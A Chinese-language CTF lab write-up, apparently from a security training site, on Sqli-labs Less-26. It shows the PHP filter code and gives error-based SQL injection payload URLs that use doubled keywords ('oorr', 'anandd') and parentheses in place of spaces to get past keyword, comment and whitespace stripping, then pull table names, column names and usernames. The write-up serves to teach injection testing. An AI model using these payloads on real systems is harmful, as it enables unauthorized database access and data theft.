当前位置:天云网络培训 > 学习专栏 > CTF > SQL注入:当注释符被过滤时如何逃逸单引号/双引号

SQL注入:当注释符被过滤时如何逃逸单引号/双引号

Sqli-labs:less-26
学习到:
*当注释符被过滤的时候你还可以怎样逃逸单引号/双引号
!在句尾使用and ‘1’=’1 去闭合最后的单引号或者是:||’1’=’1
*当空格被过滤时你应该怎么做
!可以使用()来代替空格或者是%a0 /**/ %0a ` 双空格

过滤代码如下:

	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes

于是构造了payload:

https://127.0.0.1/sql/Less-26/?id=1'oorr(updatexml(1,concat(0x7e,(select(databse()))),0x7e))anandd'1'='1

 

//报错注入

https://127.0.0.1/sql/Less-26/?id=1'oorr(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),0x7e))anandd'1'='1

 

https://127.0.0.1/sql/Less-26/?id=1'oorr(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))),0x7e))anandd'1'='1

 

https://127.0.0.1/sql/Less-26/?id=1'oorr(updatexml(1,concat(0x7e,(select(group_concat(username))from(security.users))),0x7e))anandd'1'='1

 

RIPRO主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
天云网络培训 » SQL注入:当注释符被过滤时如何逃逸单引号/双引号
讲师:Miracle

讲师:Miracle 学员

分享到:

相关推荐

天云安全,多年安全积累,值得信赖

立即查看 了解详情